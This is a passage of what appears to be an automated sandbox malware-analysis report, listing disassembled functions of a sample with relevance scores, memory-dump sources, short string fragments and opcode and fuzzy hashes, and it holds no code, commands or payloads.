                                • Instruction Fuzzy Hash: 03E1C4B1E052A89EF720CA24DC447EABAB5EF51314F0480FAD44CA7681D67E0FD58F66
                                Function 0041C004 Relevance: 20.3, Strings: 16, Instructions: 313COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 7$7$A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-1200273302
                                • Opcode ID: 28ba7fbba3feb0cead49acf312b846af2c6be0a3097d648dea64c9067175bc85
                                • Instruction ID: b47088309b577f7c50cf058c335edba89fd58862b3e482b340e0a04e71949f29
                                • Opcode Fuzzy Hash: 28ba7fbba3feb0cead49acf312b846af2c6be0a3097d648dea64c9067175bc85
                                • Instruction Fuzzy Hash: 0DC12571D082A48EF7208624DC84BEA7BB5EF91314F0441FAD48D9B282D77D5FC28B66
                                Function 0041C026 Relevance: 20.3, Strings: 16, Instructions: 302COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 7$7$A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-1200273302
                                • Opcode ID: 1478cf694196ca9b350df43d916b710f63da0de0c4049037703d7dd154c96519
                                • Instruction ID: 6a6821eb800bc17307eb9a5ec330426600e786462c0f6a262b46102692df8cb9
                                • Opcode Fuzzy Hash: 1478cf694196ca9b350df43d916b710f63da0de0c4049037703d7dd154c96519
                                • Instruction Fuzzy Hash: 5CC1D471D082A88EF7208724DC84BEA7BB5EF91314F1441FAD48D97282D7795FC28B66
                                Function 004107D7 Relevance: 19.1, Strings: 15, Instructions: 305COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$NFAF$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2975757544
                                • Opcode ID: eac9a8c89c20c730b821d41ff1d73c862a32a5d1deaca93cfb33df2c4e0a530f
                                • Instruction ID: c3fc6b31299b4ff0d883bf28e2f011910b9e91c0d681c6d53ca398b40e37eec5
                                • Opcode Fuzzy Hash: eac9a8c89c20c730b821d41ff1d73c862a32a5d1deaca93cfb33df2c4e0a530f
                                • Instruction Fuzzy Hash: A2D1DDB0D091688BEB24CB14CC90BEAB7B6AF85304F1481EAD50DA7742D2795FD2CF46
                                Function 004109E9 Relevance: 19.0, Strings: 15, Instructions: 240COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$NFAF$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2975757544
                                • Opcode ID: d10fddae31009e03eeeb6f156b61e872a3f9cdd0c8a31fb12ca3dd6dc8f7b315
                                • Instruction ID: 222e1c32f40c1fa7557b5a4b6e74b342b59b81caba43ebd11db7046d890ecc55
                                • Opcode Fuzzy Hash: d10fddae31009e03eeeb6f156b61e872a3f9cdd0c8a31fb12ca3dd6dc8f7b315
                                • Instruction Fuzzy Hash: 62A13670D091988AEB20CB24CC947EABB75EF46304F1480EEC94DA7682D6795FC5CF56
                                Function 00412B5A Relevance: 18.1, Strings: 14, Instructions: 565COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-3554693867
                                • Opcode ID: 7fc3e6264b1054c1455f561d4706910a5e0b1591009595303363064f7f158b39
                                • Instruction ID: 5ead059eaa7cd9a067d0d8ed639daa6005f14ddb8a8e090dcf56ebaa6fb9b4a1
                                • Opcode Fuzzy Hash: 7fc3e6264b1054c1455f561d4706910a5e0b1591009595303363064f7f158b39
                                • Instruction Fuzzy Hash: 9A32EDB1E052689FEB20CA14DC84BEABBB5EF85314F0440FAD80DA6681D7795FC18F56
                                Function 0041283C Relevance: 18.0, Strings: 14, Instructions: 518COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-3554693867
                                • Opcode ID: bbe065e44803fceb44910dd713dd737582de35f73896f6804351aca1609d64bb
                                • Instruction ID: 6d92df309adc330b37f7ccbb712304135bdbf154322a6cc1afe4e9e412da2afb
                                • Opcode Fuzzy Hash: bbe065e44803fceb44910dd713dd737582de35f73896f6804351aca1609d64bb
                                • Instruction Fuzzy Hash: 5422F1B2D052689EFB208A24DC84BEAB7B5EF94314F0441FAD80CA6681D37D5FC58F56
                                Function 00410055 Relevance: 17.8, Strings: 14, Instructions: 345COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: 634296a12868fe64c444dd1a69aa1a87964b2178c4ef8a4b1c10bf87dd00030f
                                • Instruction ID: 28573b431104de714659e14005bc12ea8d4cedfd95a2f1439b6d5c9cc77b15a0
                                • Opcode Fuzzy Hash: 634296a12868fe64c444dd1a69aa1a87964b2178c4ef8a4b1c10bf87dd00030f
                                • Instruction Fuzzy Hash: E9E1EF70D052688BEB60CB14CC90BEAB7B6EF85304F1481EAD80CA7342DA795ED5CF56
                                Function 00410230 Relevance: 17.8, Strings: 14, Instructions: 337COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: ef59bf22e05791a33724f3ed629b16e6f991e9f2a5fdbdc59e71daa04ad1fb63
                                • Instruction ID: 15585694ee10a1af81d3344b63c63003f30c9683754b990a81afad693c7aaae2
                                • Opcode Fuzzy Hash: ef59bf22e05791a33724f3ed629b16e6f991e9f2a5fdbdc59e71daa04ad1fb63
                                • Instruction Fuzzy Hash: BAD13471D082A89BE720CB24DC94BEB7B75EF82304F1480FAD84C96642D6795EC6CF56
                                Function 004145A6 Relevance: 17.8, Strings: 14, Instructions: 323COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-3554693867
                                • Opcode ID: 1cd384cfedf5098ace8ea5216cae827cfe3210be41f4b8d5cb514916e501c877
                                • Instruction ID: 2ed12cd81298c9345680a260f68604c3c016c5ff2124f8e24448ea315dcded80
                                • Opcode Fuzzy Hash: 1cd384cfedf5098ace8ea5216cae827cfe3210be41f4b8d5cb514916e501c877
                                • Instruction Fuzzy Hash: 0ED1C0B1E052A88EEB20CA24DC547EABBB1EF51304F1440FAD84CAA681D67D5FC5CF56
                                Function 0041021F Relevance: 17.8, Strings: 14, Instructions: 306COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: 706b7ac295f89db17e70667ec3c733dcfd7490300e0e2b5d44a24442ab6ae808
                                • Instruction ID: 92f5c4d632993d2955ae432ad90fb1a8f41d132a6a9c79ee99be0bf5b94c74d7
                                • Opcode Fuzzy Hash: 706b7ac295f89db17e70667ec3c733dcfd7490300e0e2b5d44a24442ab6ae808
                                • Instruction Fuzzy Hash: 5FC12371D092689AEB20CB24DC94BEB7BB5EF82304F1480FAD80C97642D6795EC5CF56
                                Function 00410301 Relevance: 17.8, Strings: 14, Instructions: 297COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: 8e8d9158ca9b8abab3a3b774b4b52a3f924db1011733c6d65a5399ab46df8f72
                                • Instruction ID: 2b818438b28575bd9d6757f77d77d774293a2b07f6e30c91a71e44f65a72ce33
                                • Opcode Fuzzy Hash: 8e8d9158ca9b8abab3a3b774b4b52a3f924db1011733c6d65a5399ab46df8f72
                                • Instruction Fuzzy Hash: B9B144B1D082989BE7208B24DC44BEA7B75EF81304F1481FAD84D96282D6BD4EC6CF56
                                Function 0041C0CB Relevance: 17.8, Strings: 14, Instructions: 271COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: c7450f78a140988aafbe20effae2c912bb7a2aeda3910e8f9251d5a6e1c219e1
                                • Instruction ID: 003180d38f77cc8803a351203a56c8e9cbafbc388e8f12235da44feb45b75d57
                                • Opcode Fuzzy Hash: c7450f78a140988aafbe20effae2c912bb7a2aeda3910e8f9251d5a6e1c219e1
                                • Instruction Fuzzy Hash: 03A1F2B1D082648EF7208B24DC84BEA7BB5EF81314F1480FED44D97682D6795FC18B66
                                Function 0041C137 Relevance: 17.7, Strings: 14, Instructions: 242COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: 48a71ff226f7c8b23cdaa05fc023dd6ca970369c303e6648c1c65ee50e03d9b4
                                • Instruction ID: 4232c71923d7ff96c5d4261595b4d506814e236fc931062ee2a06c6d669e28f4
                                • Opcode Fuzzy Hash: 48a71ff226f7c8b23cdaa05fc023dd6ca970369c303e6648c1c65ee50e03d9b4
                                • Instruction Fuzzy Hash: DF91C271E082648EF7208B24DC94BEA7BB5EF91314F1440FAD44D9B282D7795FC18B66
                                Function 0041C23F Relevance: 17.7, Strings: 14, Instructions: 237COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: 51a5462b0a0d234f005479872fe2b4ef8c0471cf4fb9cf407325ce1734e3bd93
                                • Instruction ID: e0eb7f884e8821d0944b33b22deaa3c5efca6b21bc5b3fbf50a19b8caf8ce7c4
                                • Opcode Fuzzy Hash: 51a5462b0a0d234f005479872fe2b4ef8c0471cf4fb9cf407325ce1734e3bd93
                                • Instruction Fuzzy Hash: 959114B1E082A48EE7208625DC94BEA7BB5EF91314F1480FAD48D97281D6794FC1CB67
                                Function 0041C223 Relevance: 17.7, Strings: 14, Instructions: 233COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: a842a74a3559f796a02ef51823d2bc317834c95b7d762b6a44aa06129246b5b3
                                • Instruction ID: 5e8891abed41657f7e989aadf462fdff952da4f4b7056756378e3675ff061b49
                                • Opcode Fuzzy Hash: a842a74a3559f796a02ef51823d2bc317834c95b7d762b6a44aa06129246b5b3
                                • Instruction Fuzzy Hash: F1910671E082A48EE7208624DC947EA7BB6EF91314F1480FAD48D97282D6795FC1CB66
                                Function 0041C19A Relevance: 17.7, Strings: 14, Instructions: 217COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: 95c483703ca303077823e4826ff1c2655350a0e84919372891e95e0b2db9a442
                                • Instruction ID: df58a994ca3e62e78a3978717fc5b382f7e4bc14de4042cd30d801fb280ed65f
                                • Opcode Fuzzy Hash: 95c483703ca303077823e4826ff1c2655350a0e84919372891e95e0b2db9a442
                                • Instruction Fuzzy Hash: 4781D371E082548EF7208624DC94BEBBBB5EF91314F1480FAD48D97282D77D5EC18B66
                                Function 00412870 Relevance: 16.5, Strings: 13, Instructions: 279COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
